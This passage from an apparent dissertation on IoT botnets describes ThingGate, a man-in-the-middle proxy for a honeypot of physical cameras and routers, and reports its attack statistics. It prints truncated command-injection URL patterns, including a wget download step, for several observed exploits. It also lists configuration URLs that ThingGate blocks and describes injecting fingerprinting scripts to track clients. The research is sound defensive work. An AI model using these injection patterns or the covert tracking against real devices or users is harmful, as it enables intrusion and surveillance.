we propose IoTProtect, a countermeasure of IoT Botnets and evaluating the approach with IoT
malware in physical IoT devices. Fig. 2 shows the mapping between flow of research and our
methods. By considering the different goals we want to achieve, we introduce these three
approaches in section 3.1, section 3.2, and section 3.3.
15
Fig. 2 Flow of studying cyber attacks in IoT.
3.1. Observation of cyber attacks in IoT
Applying physical IoT devices for building honeypots brings the following challenges:
1. The resource of IoT devices are limited and install additional libraries may modify the
firmware.
2. The reset or recovery process need some manual operation on devices. Many IoT devices
place the reset button on the control panel, and users have to press the button for a while to
trigger the reset function.
3. Some attack vectors, such as BrickerBot, can impair devices [37]. BrickerBot prevents
devices from working again even with a factory reset. Moreover, some vulnerabilities, such
as CVE-2017-17020, may cause a service shutdown. These types of attack vectors require the
employment of human resource for maintenance [38].
4. For analyzing attack vectors against IoT devices, purchasing all of physical IoT devices to
16
build honeypot is not affordable. We only can utilize a limited number of devices in a
honeypot. If the devices' weakness does not fit the incoming attack vector, the attack fails and
IoT devices cannot capture the further flow or binaries from clients.
5. In SIPHoN [5], Guarnizo et al. indicated that scanning for Wi-Fi networks is a feature often
offered in the admin interfaces of IP Cameras. The goal of SIPHON is to collect world-wide
cyber attacks against IoT via a few devices deployed locally. However, their research did not
mention if the Wi-Fi Access Point (AP) name may expose location or not. The Wi-Fi AP list
may dynamically show any scanned AP, include a Personal Hotspot from a passerby's mobile
devices. The name of AP in WebUI may consist of personal or organization information lead
to exposing the physical location of honeypot.
To face the challenges from the physical IoT devices, we proposed ThingGate, is a customized
MITM proxy for managing flow between clients and the honeypot that consists of real IoT devices.
ThingGate achieves the following functionalities:
1. Incoming traffic management
We wish to block the incoming flow of unwanted or deadly attack vectors.
2. Extending functions of web tracking
Our proxy injects fingerprinting JavaScript codes through a MITM to track user clients.
3. Response information management
Our program checks the HTTP response from IoT devices and prevents the leakage or exposure
of sensitive information. Blocking Wi-Fi with an electromagnetic shielding container is costly.
We hope to prevent leakage through a light-weight and straightforward method.
4. Real-time analysis of misplaced cyber attack
IoT malware employs various vulnerabilities from WebUI of devices and injects OS command
in the URL. However, some malware didn't check targeted devices before they send malicious
17
HTTP requests. For the misplaced command injection URL (CI-URL) which attack target is
not in our physical IoT devices, we can conduct real-time analysis and download tasks.
3.2. Analysis of cyber attacks in IoT
IoT honeypot has successfully observed Botnets targeting IoT devices over Telnet and HTTP
protocols. The observation brought massive data of malware binaries and attack vector logs.
Besides, IoT malware continues to evolve, and the diversity of OS and environments increases
the difficulty of executing malware samples in dynamic analysis. To address these problems, we
want to develop an alternative means of the investigation by using the attack vectors and analyzing
malware without executing it. Moreover, we summary the attack vectors to create an in-depth
view of cyber attacks in IoT.
The primary attack vectors come from cyber attacks in IoT are through Telnet protocol (75%)
[8]. Thus we focus on analyzing the Telnet logs and malware binaries. The dataset come from the
honeypot consisted of physical IoT devices. To compress the data, we develop an encoding
method for mapping Telnet logs to simplified character sequences.
Further, studying and evaluating the best distance algorithm for distinguishing these sequences
according to the malware families. As a result, we extract key patterns of different interaction
behavior using an N-gram model. We employ both unsupervised or supervised learning
algorithms and text-mining algorithms for handling unstructured data. For unsupervised learning
algorithms, because the cyber attacks in IoT keep evolving, and the pattern of attacks is uncertain.
Therefore, we choose the hierarchical clustering method because it does not require to predefine
the number of clusters.
For supervised learning algorithms, we propose a malware classification method based on
malware binaries, command sequences, and meta-features. Our approach trains a multiclass
classifier to identify IoT malware categories based on common infection behavior. For
18
misclassified subclasses, second-stage sub-training is performed using a file meta-feature. Finally,
we used a confusion matrix and accuracy to measure the classification result.
3.3. Countermeasure of cyber attacks in IoT
Form the attack campaign of IoT Botnets, mostly the attacker will upload malware binaries to
a writable folder of victim devices. Besides, the filesystem and storage of low-cost IoT devices
are limited, and most files are read-only or generated by Linux kernel on-the-fly. Therefore, the
length of whitelists is only a few thousand. Based on these features, we proposed IoTProtect, is a
whitelisting method for protecting low-cost IoT devices. IoTProtect consists of three whitelists
and a checker program. The pathname whitelist is a list of pathnames of all legitimate executables.
The hash value whitelist records MD5 hash values of binaries on IoT devices. The comparison
and whitelist of cmdline content are optional and performed only if there are processes that cannot
display their pathname and exe links in the "proc" filesystem.
For the creation of whitelists, we assume that the device to be protected has already been
developed and that the device developer is to install IoTProtect on top of the existing system. We
skip the files coming from on-the-fly filesystems, such as sysfs, proc, usbfs, and I/O files. If
developers know precisely which executable files to include on the whitelist, they can create their
whitelist manually. However, recent IoT device products are often not developed by a single
manufacturer, and each developer does not know all of the legitimate executables exactly. In such
a case, developers can still create whitelists that include all executables existing in the system by
using the Linux command "find" with the "-exec" expression and "md5sum." Moreover, the
cmdline whitelist can be created by "find" with the "-exec" expression and "cat" Linux commands.
IoTProtect first filters processes that are not included in the pathname whitelist and then filters
the remaining processes according to the hash value whitelist. It then filters the remainder with
the cmdline whitelists if there are any processes with no pathname and exe links. Finally, it
19
removes all remaining processes.
In the dissertation, we conducted experiments with four actual IoT devices and 4,981 malware
binaries captured by our IoT honeypot for evaluation. We show four different experiments to
evaluate the effectiveness, overhead, and easy deployment of IoTProtect.
20
Chapter 4.
ThingGate: A gateway for flexible operation of bare-metal IoT
honeypot
4.1. Introduction
In recent years, people have been connecting various things to the Internet for monitoring,
collecting data, or remote manipulation. Backend applications collect and exchange data with
these devices through the network. This network of this appearance is called the Internet of things
(IoT). However, an IoT Malware “Mirai” was used for conducting the massive Distributed Denial
of Service (DDOS) attack against Dyn DNS In October of 2016. There were about 100,000 Mirai
IoT Botnet nodes were enlisted in this incident and reported attack rates were up to 1.2 Tbps [2].
Therefore, cyber threats from IoT Botnet have become a reality. To observe cyber attacks against
such devices and analyze the threats from IoT malware, some researchers design new observation
mechanisms and build various honeypots. These honeypots include, for example, IoTPOT [4],
SIPHON [5], IoTCandyJar [6], and real devices honeypot for observing Web UI of IoT devices
[7].
The competition between hackers and cybersecurity researchers is an endless war. IoT malware
keeps evolving and exploits multiple vulnerabilities to infect IoT devices. Since May 2018, the
Mirai and Bashlite malware families that assimilate multiple known exploits affecting the Internet
of Things (IoT) devices. These exploits come from 11 makers' devices over HTTP, UPnP, Telnet,
and SOAP protocols [3]. Besides their well-known activities such as DDoS, recent IoT malware
have diverse purposes including coin mining, click fraud, and sending spam emails. Nonetheless,
human attackers also utilize various tools to access and collect variable information on the device.
For examples, WebUI of many IP Cameras and routers are constantly searched and accessed if
21
vulnerable. In order to observe and analyze such a variety of attacks in depth, there is an increasing
need for a bare-metal IoT honeypot, namely a real IoT device, as a honeypot. Cause it is costly to
emulate device-specific vulnerabilities and complicated functionalities provided through their
WebUI and other dedicated services, such as UPnP.
However, it is worth noting that operating bare-metal IoT honeypots has unique technical
challenges mostly coming from their low configurability as an embedded system. For example,
honeypot operators may need to control the incoming traffic since there are critical attacks that
may destroy firmware and/or change the network configuration of devices that could disconnect
the honeypot devices. Also, honeypot operators may need to mask and/or replace outgoing
responses from the honeypot devices as they may contain information such as surrounding
wireless access points, which could reveal the physical location of the honeypot devices.
4.2. Definitions
4.2.1. Man-in-the-middle
The man-in-the-middle (MITM) refers to an attack in which the attacker positions themselves
between two communicating parties and secretly relays or alters the communication between
these parties, who believe that they are engaging in direct communication with each other.
Messages intended for the legitimate site are passed to the attacker instead, who saves valuable
information, passes the messages to the legitimate site, and forwards the responses back to the
user. The MITM way can lead to the web proxy attack, in which a malicious web proxy receives
all web traffic from a compromised computer and relays it to a legitimate site. The proxy collects
credentials and other confidential information from the traffic. MITM flows are difficult to detect
because a legitimate site can appear to be functioning properly and the user may not be aware that
something is wrong [39]. We utilize a web proxy attack to monitor and manage the flow between
clients and our honeypot.
22
4.2.2. Transparent Proxy
In computer networks, a proxy server is a server that acts as an intermediary for requests from
clients seeking resources from other servers [40]. A proxy server can fulfill the request from the
client, filter out, or modify the request in a specific way. Transparent Proxying or a transparent
proxy means we redirect traffic into a proxy at the network layer, without any client configuration
[9]. The client is unaware that the response received originates from the proxy server and not from
the source server. We conduct the flow forwarding through MITM proxy by pf of FreeBSD [41]
and socat [42].
4.2.3. Browser fingerprinting
Browser fingerprinting involves making a recognizable subset of users unique. The fingerprint
is primarily used as a global identifier for those users. Furthermore, we can utilize a global
identifier to create a web tracking mechanism for user browsers [43]. In 2012, Mowery and
Shacham presented canvas fingerprinting, which is a web fingerprinting algorithm [44]. They
demonstrated that the new HTML5 feature could be used to generate a relatively unique
fingerprint that could be used to track users. Canvas fingerprinting uses the browser’s Canvas API
to draw invisible images and extract a persistent, long-term fingerprint without the user’s
knowledge [45]. Tracking mechanisms have advanced such that these mechanisms are difficult to
control and detect and are resilient to blocking or removing. Another feature of canvas
fingerprinting is that the resulting fingerprint may differ from one browser to another on the same
machine [46]. In this study, we use fingerprintjs2 [47], which is an open-source library of canvas
fingerprinting, to achieve the web tracking function.
4.2.4. Cyber attacks against WebUI of Physical IoT Devices
In 2017, Ezawa et al.[7] proposed a honeypot consisting of physical IoT devices to observe
attacks against the WebUI of IoT devices. The devices include IP Cameras, routers, pocket routers,
23
a printer, and a TV receiver. In 2018, Tamiya et al. [17] employed five IP Cameras to build a
decoy honeypot to capture the behavior of peeping attackers. According to these two honeypots,
we summarized four kinds of cyber attacks against these WebUI:
1. Configuration information theft attacks
If the device contains vulnerabilities of information disclosure or weak credentials. The
attacker can collect the configuration and parameters of devices by some URLs, such as
get_status.cgi.
2. Modification of the configuration
According to the observation of the two honeypots, attackers may modify the DDNS, VPN,
credentials, and network configuration.
3. Snapshot attacks
Snapshot is a feature of IP Cameras and offers a current time image of the live stream to users.
Once the clients send the HTTP request of the snapshot, the web server will provide the
current time image in a JPG or PNG file.
4. Long term peeping
This attack collected by IP Cameras when some clients access the URL of the live stream.
Moreover, the clients stay on the web page of live streams for several hours.
4.3. ThingGate
4.3.1. System goal
The use of conventional IoT devices for building new honeypots raises the following
challenges:
1. Poor expandability
The resource of IoT devices are limited and install additional libraries may modify the firmware.
2. Inconvenient reset or restore mechanism
The reset or recovery process need some manual operation on devices. Many devices place the
reset button on the control panel, and users have to press the button for a while to trigger the
reset function.
3. Threat of service segmentation fault attacks or brickering command
24
Some attack vectors, such as BrickerBot, can impair devices [37]. BrickerBot prevents devices
from working again even with a factory reset. Moreover, some vulnerabilities, such as CVE-
2017-17020, may cause a service shutdown. These types of attack vectors require the
employment of human resource for maintenance [38].
4. Misplaced cyber attacks in IoT flow
For analyzing attack vectors against IoT devices, purchasing all of physical IoT devices to build
honeypot is not affordable. We only can utilize a limited number of devices in a honeypot. If
the devices' weakness does not fit the incoming attack vector, the attack fails and devices cannot
capture the further flow or binaries from clients
5. Exposure risk from the sensor information
In SIPHoN [5], Guarnizo et al. indicated that scanning for Wi-Fi networks is a feature often
offered in the admin interfaces of IP Cameras. The goal of SIPHON is to collect world-wide
cyber attacks against IoT via a few devices deployed locally. However, their research did not
mention if the Wi-Fi Access Point (AP) name may expose location or not. The Wi-Fi AP list
may dynamically show any scanned AP, include a Personal Hotspot from a passerby's mobile
devices. The name of AP in WebUI may include personal or organization information lead to
exposing the physical location of honeypot.
ThingGate is a customized MITM proxy for managing flow between clients and the honeypot
that consists of physical IoT devices. To face the challenges from the honeypot of physical IoT
devices, we define the following goals.
1. Incoming traffic management
We wish to block the incoming flow of unwanted or deadly attack vectors.
2. Extending functions of web tracking
Our proxy injects fingerprinting JavaScript codes through a MITM to track user clients.
25
3. Response information management
Our program checks the HTTP response from IoT devices and prevents the leakage or exposure
of sensitive information. Blocking Wi-Fi with an electromagnetic shielding container is costly.
We hope to prevent leakage through a simple and light-weight method.
4. Real-time analysis of misplaced cyber attack
IoT malware employs various vulnerabilities from WebUI of devices, and injects OS command
in the URL. However, some malware didn’t check targeted devices before they send malicious
HTTP requests. For the misplaced command injection URL (CI-URL) which attack target is
not in our physical IoT devices, we can conduct real-time analysis and download tasks.
4.3.2. System Overview
Our design, which was inspired by SIPHON architecture [5], is displayed in Fig. 3. Our
honeypot consists solely of physical IoT devices. Moreover, SIPHON’s forwarder is improved
with an MITM proxy to manage the forward traffic from wormholes to local physical IoT devices.
We design a module to analyze some CI-URLs. These flows may target IoT devices other than
ours.
Fig. 3 System overview of ThingGate
26
Wormhole. The wormhole device contains some ports open to the general Internet on a public IP
address. We transparently forward the incoming traffic toward these ports through an MITM
proxy to a specific port on a remote physical IoT device. Forwarding is conducted through socat
[42], which is a command-line-based utility that establishes two bidirectional byte streams.
CI-URL Analysis and Downloader (CAD). If the flow contains features of CI-URLs, then we
redirect the HTTP request to CAD. CAD provides 200 response codes to the client and analyzes
the CI-URL. If CAD successfully extracts download links from the flow, real-time download
tasks of links can be conducted.
MITM Proxy. The socat utility ensures that the traffic between the wormhole and the IoT device
has managed to accomplish the protection and HTTP response rewriting tasks in real time. The
proxy examines all the flows and decides to block, delegate to devices, or redirect the flow to the
CI-URL analysis and downloader (CAD). The proxy conducts the modification of the flow
through the MITM way.
IoT Devices. IoT devices are typical commercial off-the-shelf devices that contain vulnerabilities.
In this system, we focus on cyber attacks against the WebUI of IoT devices. Thus, we only forward
incoming HTTP flow to its HTTP service ports.
Data Storage. The storage dumps traffic records from the wormholes and aggregates the data for
offline analysis. For example, Wireshark is used to analyze the headers of HTTP requests in
dumped traffic files.
4.3.3. System Architecture and Modules
The system architecture of the ThingGate system is displayed in Fig. 4. The MITM proxy
transparently manages the input and output flow of the honeypot constructed with physical IoT
devices in real time. IoT devices answer the flow delegated by the proxy and send the HTTP
27
response back to the client through the MITM proxy. Moreover, the proxy redirects specific HTTP
requests that contain CI-URLs to the CAD. Then CAD extracts links and downloads malware
binaries. Moreover, our proxy injects fingerprinting JavaScript codes into the HTTP response
content and replaces sensitive information with fabricated material.
Fig. 4 System Architecture of ThingGate
The details of the modules are as follows:
Request Controller. The request controller is in charge of incoming HTTP requests. The request
controller reviews every request and determines whether the flow should be directly forwarded to
IoT devices. The process of URL checking is illustrated in Fig. 5. First, we examine whether the
URLs utilize the dangerous vulnerability of our IoT devices. For example, D-Link’s IP Camera,
DCS-5020L, contains vulnerabilities in its WebUI. If attackers post a long string value to the URL
“/setSystemNetwork” in the form parameters, then the HTTP request causes the web service to
crash [48]. Therefore, the request controller replaces the URL with another valid URL. Second,
28
according to Ezawa’s study, some attackers change the DDNS, VPN, or network settings of IoT
devices [7] to prevent other clients from accessing the device. These attacks may incur the
necessity of performing manual tasks such as rebooting or resetting devices. Therefore, we must
protect these critical configurations. The request controller compares the URLs of the incoming
request, filters out the requests that cause unwanted configuration changes, and replaces these
URLs with other valid URLs of the WebUI. Third, our program verifies the operating system
(OS) commands and different URLs embedded in the URL. The request controller redirects these
CI-URLs to the CAD. Finally, the request controller forwards the remaining HTTP requests to
IoT devices.
Fig. 5 The processing flow of Request controller
Response controller. The response controller is in charge of the HTTP responses from IoT
29
devices. Three conditions trigger action by the response controller.
1. The HTTP response from IoT devices contains a body tag.
The response controller injects fingerprinting JavaScript codes into the body tag. The
JavaScript library creates a hash fingerprint if the client can support the JavaScript code.
2. The HTTP response includes sensitive information
In this method, we focus on the Wi-Fi AP list. The name of the Wi-Fi AP may consist of a
username or information concerning the organization or location. The response controller
replaces all APs with fabricated AP information.
CI-URL Analyzer. is responsible for the two analysis of extracting download links from the CI-
URLs and downloaded scripts. The CI-URL analyzer includes two components, namely the URL
parser and script parser. The URL parser decodes the CI-URLs and transforms them into OS
commands (Fig. 6). The CI-URL in Fig. 6 utilizes the vulnerability of the D-Link router DSL-
2750B [49]. The URL parser decodes the CI-URL and extracts the link from the OS commands,
"http://yyy.yyy.173.159/d." The CI-URL analyzer also passes the link to the downloader.
Fig. 6 The encoded URL of CI-URL and decoded results
If we successfully download the file and the file is a shell script file (e.g., the script displayed
in Fig. 7), then the script parser analyzes the content, traverses all parameters, and extracts the
links of malware. Finally, the script parser passes the links of malware to the downloader.
30
Fig. 7 Downloaded Scripts from CI-URL
Downloader is responsible for download malware binaries tasks. We found the header
parameters' value in HTTP requests conducted by IoT devices may be distinguished from
Unix/Linux server operating system. For example, the user-agent value conducted by macOS
Mojave 10.14.2's wget command is "Wget/1.13.4 (darwin13.1.0)". The "darwin13.1.0." is a
library name of macOS packages [50]. In contrast to the user-agent value produced by macOS,
that produced by the router A in Table 1 is “Wget./1.16 (linux-gnu)." Therefore, the user-agent in
HTTP header may expose the information of the download client. Therefore, we customized our
header values appear as similar as possible to IoT devices.
4.4. Evaluation
4.4.1. Prototype and dataset
We developed a prototype of ThingGate using Python and the MITM proxy open-source
software [51]. We performed four different experiments with seven physical IoT devices to
evaluate the effectiveness of ThingGate. Table 1 presents the specification of our devices, all of
which contained vulnerabilities that had been publicly disclosed. Besides, we installed ThingGate
on a server with four cores Intel 3.10 GHz CPU, 16 GB RAM, and 1.8 Terabytes disk.
31
Table 1 IoT devices used in experiments.
IoT device Maker’s country
CPU Arch. Appr. price* (JPY)
Router A Taiwan MIPS 26,000
IP Camera A1 China ARM 4,980
IP Camera A2 China ARM 4,980 IP Camera A3 China ARM 4,980
IP Camera B USA ARM 3,000
IP Camera C Taiwan MIPS 14,000
IP Camera D Taiwan MIPS 7,960
* We collected this price information from Amazon Japan on Oct. 1, 2018. IP Camera A1 ~A3 are the
same mode devices
Table 2 presents the two datasets collected by our honeypot through ThingGate. From September
8 to October 13, 2018, we used five devices and 19 IP addresses to collect the attack flow (dataset
1). Moreover, we analyzed the URL list of critical configurations and the URLs of deadly
vulnerabilities from our IoT devices. We designed and implemented the prototype of ThingGate
according to dataset 1. From November 17, 2018, to June 31, 2019, we deployed ThingGate and
forwarded 19 IP addresses to conduct the evaluation experiments. The collected flow for this
period is labeled as dataset 2.
Table 2 Data set for analysis.
Data set Number of
HTTP
requests
Number of
honeypot
IP
Time interval Analysis subjects
1 307,405 19 2018/09/08~
2018/10/13 Blocking list, CI-URL, and CAD
2 1,920,653 19 2018/11/17~
2019/06/30
Blocking unwanted flow,
Web tracking,
Handle misplaced attack,
Fabricated sensor content
32
Table 3 shows the distribution of HTTP methods in dataset2. The GET and POST accounted
for the vast majority (97 %) which contain various cyber attacks against HTTP services. Moreover,
some of the OPTION method flows come from the Real Time Streaming Protocol (RTSP) [52].
The RTSP traffic means some attackers or malware recognized our devices are IP Cameras and
want to utilize our RTSP services. Besides, the M-SEARCH and NOTIFY traffic are based on
Universal Plug and Play protocol (UPnP) [53]. Our devices disabled the UPnP port and services
by default, but the clients try to attack our UPnP service. For the PROFIND flows, the clients
blindly sent remote buffer overflow packets which against IIS 6.0 [54].
Table 3 HTTP method statistics for dataset 2.
HTTP method count Percentage
(100%)
CONNECT 420 0.022
GET 1,512,526 78.751
HEAD 7,062 0.368
M-SEARCH 41,961 2.185
NOTIFY 67 0.003
OPTIONS 264 0.013
POST 356,272 18.550
PROPFIND 1,938 0.101
PUT 132 0.006
Table 4 presents the statistics of HTTP requests, attackers' IP address and URLs. Because we
forward fifteen IP address for IP Camera A1, A2, and A3, they got the most HTTP requests.
However, IP Camera C got the most HTTP requests and clients' IP on condition that forwarding
only one IP traffic to each device.
33
Table 4 Statistics of cyber attacks. Observation of 7 months..
IoT device Honeypot
IP counts
HTTP request
counts
Unique attacker
IP counts
Unique URL
counts
Router A 1 17,447 1,808 6,150
IP Camera A1 5 340,316 22,336 2,300
IP Camera A2 5 455,639 23,196 4,546
IP Camera A3 5 193,941 13,642 1,573
IP Camera B 1 54,024 4,581 1,740
IP Camera C 1 782,645 4,291 2,8111
IP Camera D 1 76,641 4,422 1,395
Total 19 1,920,653 57,230 38,374
4.4.2. Cyber attacks against the WebUI of physical IoT devices
According to dataset 2, there are 1,920,653 cyber attacks employed HTTP requests to attack
our honeypot. Some of these attacks are only able to be observed by physical devices. We
collected similar attacks which present in Ezawa's and Tamiya's honeypot [7][17]. We found
attackers attempt to capture and modify the configuration of devices, remotely control direction
and zoom of IP Camera, peep the live video, snapshot of IP Camera and utilized the remote code
execution (RCE) vulnerability of devices [55]. In addition, after the RCE attack vector, the
attacker download devices' live stream by access a hidden web application. The application
"/video.cgi"did not appear in source code and can be customized by width and height parameters.
Table 5 shows the statistic and description of the attack against our physical device.
There were 49 source IPs has watched the live stream of the camera. Among them, five IPs
were peeking over an hour. The maximum time of peeking is about 18 hours. Moreover, some
clients from 21 source IP addresses adjusted the directional and zoom of the camera. One client
from American applied the RCE exploit code of IP Camera C to attack IP Camera C and D. The
34
Live stream for long term peeping, the real-time response of control direction and zoom, and the
whole scenario of RCE attack are hard to simulate by VM-based honeypot. Our physical devices
behind ThingGate successfully observed these kinds of cyber attacks.
Table 5 Cyber attacks against WebUI of IoT devices. Observation of 7 months from IP Camera A1~A3,
B, C, and D.
Category Pathname Description of URL Victim devices Request
counts
Configuration
information
theft attacks
get_params.cgi Show system variables IP Camera
A1~A3, B 599
get_status.cgi Show configuration of
devices
IP Camera
A1~A3, B, C, D 1064
modification of
the
configuration
/%5ccgi-
bin/set_network.cgi Set network configuration
IP Camera A3 83
decoder_control.cgi Control directional and
zoom
IP Camera
A1~A3 153
Snapshot
attacks snapshot.cgi
Show current image of live
video stream
IP Camera
A1~A3, B 2,920
Long term
peeping
livestream.cgi Show live video stream IP Camera
A1~A3, 4560
videostream.cgi Show live video stream IP Camera
A1~A3, B 273
Remote
Command
Execution
/setSystemCommand Set OS Commands for
execution
IP Camera C, D
4
4.4.3. Blocking unwanted flow experiments
4.4.3.1. Design of experiment
We analyzed our devices and created a list of configuration URLs and dangerous vulnerabilities.
35
There are 51 critical configuration URLs and one dangerous URL in the list, and we extract the
pathname of configuration URLs to build a blacklist. Further, we select target pages in devices
for replacing the pathname in the blacklist. Table 6 presents the blacklist against IP Camera
A1~A3. Moreover, we deployed the blacklist in ThingGate and redirected flow to the target pages
if the incoming traffic matched the blacklist. The flow of one IP address was forwarded to all
devices except for the three IP Cameras.
Table 6 Configuration blacklist and replaced pathnames against IP Camera A1~A3.
Configuration pathname
Description of pathname
Replaced pathname
Description of pathname
/set_network.cgi change network settings
/admin2.htm show camera status
/reboot.cgi reboot camera /admin2.htm show camera status
/set_upnp.cgi change UPnP settings
/upnp.htm show UPnP information
/set_wifi.cgi set Wi-Fi network /wireless.htm show Wi-Fi settings
/set_ddns.cgi change dynamic DNS settings
/ddns.htm show dynamic DNS settings
/set_users.cgi change user settings /user.htm show user account settings
/restore_factory.cgi restore factory settings
/upgrade.htm show upgrade functions
/upgrade_htmls.cgi, upgrade system firmware
/upgrade.htm show upgrade functions
/upgrade_htmls.cgi upgrade WebUI /upgrade.htm show upgrade functions
4.4.3.2. Experimental results
From dataset 2, we found on June 7th, an attacker from American accessed our Wi-Fi router in
the honeypot and modified the LAN DNS setting, point to a Vietnam server. ThingGate
successfully blocked the HTTP request, filtered out the form data, and replace the URL with
another URL in WebUI. Fig. 8 shows the detail information of the HTTP request.
36
Fig. 8 The HTTP request of a modifying configuration attack.
4.4.4. Web tracking experiments
4.4.4.1. Design of experiment
We conducted this experiment on all devices in our honeypot. As illustrated in Fig. 9,
ThingGate examined the HTTP response content from all of the devices. If the response code
equals 200 and the HTML contains the body tag, then the proxy injects fingerprinting JavaScript
codes in response. If the client can render our JavaScript codes, then the client generates a canvas
fingerprint and sends it back to ThingGate.
37
Fig. 9 Web Tracking flow of ThingGate
4.4.4.2. Experimental results
From dataset 2, we found that clients from 18 different source IPs successfully sent their
fingerprint values to ThingGate. We collected 26 different fingerprint values from these clients.
The geographic information on the IPs of the fingerprinted clients is displayed in Fig. 10. Of these
clients, seven were from Japan and six were from the United States. In total, 72% of the clients
were from these two countries. Four clients provided only one fingerprint value, whereas the other
14 clients provided two or more fingerprint values. Moreover, we discovered that one of the four
single-fingerprinted clients was Googlebot [56]. We verified Googlebot by using a reverse DNS
lookup on the accessed IP address according to a Google document [57] (Fig. 11). Googlebot
attempts to access the IP Camera C and sends requests against 18 different URLs of the WebUI.
These URLs contain the snapshot, parameters of the camera, DDNS, and Wi-Fi setting pages.
Googlebot successfully collected the configuration information of the devices, including our
fabricated Wi-Fi AP list.
38
Fig. 10 Country distribution of fingerprinted clients
Fig. 11 Googlebot’s user-agent and the verifying result
Among the fingerprinted clients, three US clients sent the same two fingerprint values back to
ThingGate. Table 7 presents the attack features of the three clients. They almost traversed the
forwarding IP of the honeypot. Moreover, more than 27% of HTTP requests were utilized in the
HEAD method to attack our devices, and 83% of the URLs between the three clients were
common among them. The identical features and fingerprint values implied that the three clients
belonged to the same attacker.
39
Table 7 Features of the fingerprinted clients.
Source
IP address
Victim
devices
Unique
URL
count
HEAD
URLs
count
Common
URLs with
1st IP
Attack Duration
xxx.xxx.226.109 IP Camera
A1~A3, B, C,
and D
128 44 N/A 2018/12/05~
2019/01/11
xxx.xxx.32.101 IP Camera
A1~A3, B, C,
and D
74 23 62 2018/12/14~
2019/01/23
xxx.xxx.30.101 IP Camera
A1~A3, B, C,
and D
33 9 32 2018/12/28~
2019/01/11
4.4.5. Managing misplaced attacks experiments 4.4.5.1. Design of experiment
ThingGate examines all of the incoming flow against 19 IP addresses. If any different site with
OS commands is embedded in the URL, our program redirects the flow to CAD through an MITM
way. Next, the CI-URL analyzer analyzes the URLs and downloaded scripts. The downloader
handles all downloading tasks if our parsers extract any link during the analysis.
4.4.5.2. Experimental results
The attack flow of dataset 2 revealed that ThingGate successful redirected the HTTP requests
of 411 CI-URLs to CAD. These CI-URLs contained 50 different URLs that exploited seven
vulnerabilities. Fig. 12 depicts the vulnerability distribution of the URLs. A total of 76% of the
CI-URLs used the top two vulnerabilities from products of D-Link and ThinkPHP. The usage of
these two vulnerabilities was three times that of other vulnerabilities. Table 8 presents information
on the seven vulnerabilities, including the maker, model, version, and path of the WebUI.
40
Fig. 12 Vulnerability distribution of CI-URL
Table 8 Information of Vulnerabilities. Observation of 7 months from IP Camera A1~A3, B, C, and D.
Maker CVE/Exploit DB Type model/
version
URL pattern of vulnerability
D-Link
OS Command
Injection
(Metasploit) [49]
Router DSL-
2750B
/login.cgi?cli=aa%20aa%27;wget%2
0
ThinkPHP Remote Code
Execution [58]
Web app
framework V5.X
/index.php?s=/index/¥think¥app/invok
efunction&function
AVTECH 2015-2280 [59] Camera/N
VR/DVR
all
version
/cgibin/nobody/Search.cgi?action=cgi
_query&ip=google.com&
port=80&queryb64str=Lw==&userna
me=admin%20;XmlAp%20r%20
Account.User1.Password%3E$
AirLink 2015-2280 [60] Camera SkyIPCa
m1620W
/maker/snwrite.cgi?mac=1234&
Fastweb 2018-11336 [61] Modem V0.0067
/status.cgi_=1526904600131&cmd=3
&nvget=login_confirm
&password
41
MikroTik 2018-14847 [62] RouterOS Before
V6.38.4
/jsproxy?
TUTOS
'cmd.php' Remote
Command
Execution [63]
Software V1.3
/tutos/php/admin/cmd.php?cmd=
From the 411 CI-URLs, the CAD successful downloaded 150 different malware binaries and
23 scripts. Therefore, we searched for an optimal solution for labeling these malware binaries.
VirusTotal [64] was the platform used to obtain scan results from 66 antivirus engines. We sent
12,821 unique malware MD5s from IoTPOT in 2017 and selected the most common malware
family name as the representative malware category from the VirusTotal reports. We also
discovered that Kaspersky, DrWeb, and ESET-NOD32 are the top three antivirus engines because
of their high detection ratio and consistency. We conducted a local scan of 40,203 different IoT
malware binaries and found that DrWeb could label 39,245 of them, which comprises 97.61% of
the submitted malware. The labeling performance of DrWeb surpassed that of both Kaspersky
(69.82%) and ESET-NOD32 (74.57%). Therefore, we employed DrWeb to label the IoT malware
collected by the CAD in dataset 2.
DrWeb successfully marked 148 binaries. Fig. 13 illustrates the statistics of malware labels.
Mirai malware accounts for the vast majority of binary files (92%). We discovered that 18 Mirai
binaries employed ThinkPHP’s vulnerability to infect victim sites. Moreover, the BTCMine
malware (one binary) is a mining trojan. The attacker of the BTCMine malware also utilized the
vulnerability of ThinkPHP to attack our honeypot.
42
Fig. 13 Statistic of malware labels
4.4.6. Fabricated sensor information experiment
4.4.6.1. Design of experiment
We selected the WebUI of all of the IP Cameras as victim devices that we would like to protect.
ThingGate monitored the flow of 18 IPs forwarded to these cameras. If clients requested the web
page of scanning Wi-Fi information, we replaced the information with fabricated information. Fig.
14 depicts the webpages before and after modification with ThingGate.
43
Fig. 14 Fabricated Wi-Fi AP list
4.4.6.2. Experimental results
In dataset 2, we found that ThingGate successful sent fabricated Wi-Fi information to 44
different clients in 80 HTTP response. Table 9 presents part of the attackers’ geographical location,
number of requests sent, and duration of visit to our honeypot. The Googlebot client only sent 23
HTTP requests in one day.
Table 9 Part of attackers who request Wi-Fi information. Observation of 7 months from IP Camera
A1~A3, B, C, and D.
clients Source IP Country Requests
for
Wi-Fi
Total
request
count
Attack Duration
Client A aaa.aaa.202.28 USA 3 2704 2018/12/12~2018/
12/12
Client B bbb.bbb.169.38 USA 3 4167 2018/12/23~2018/
12/23
Client C ccc.ccc.226.5 USA 6 3476 2018/12/17~2019/
44
01/12
Client D ddd.ddd.89.58 China 1 537 2019/01/11~2019/
01/11
Client E eee.eee.148.116 China 3 2333 2018/11/19~2018/
11/19
Client F fff.fff.15.51 France 3 98 2019/01/07~2019/
01/08
Client G ggg.249.79.85* USA 1 23 2018/11/17~2018/
11/17
*The client G is Googlebot
4.4.7. Stress testing against IoT devices
4.4.7.1. Design of experiment
According to dataset 2, there is about 0.33 HTTP request towards one device per minute on
average. We take a ceiling of 0.33 that got one HTTP request per minute. Therefore, we assume
up to five users may watch the live stream of IP Cameras concurrently. Our testing employs five
Chrome browsers (v72.0.3626.121) on five computers to login IP Cameras and to view the pages
contain live streams. We both conduct the testing through ThingGate or access WebUI directly.
Also, examining each condition for ten times.
4.4.7.2. Experimental results
Table 10 shows the statistic of testing results between ThingGate and directly forwarding flow.
Our results show attackers would receive the same rendering video under the two conditions. IP
Camera B only support four clients to download live stream data. Therefore, our clients sent 50
requests on each condition and only got 40 responses with live streams.
45
Table 10 IoT devices used in experiments.
IoT Device Path Clients download
video through
TingsGate
Clients download
video.
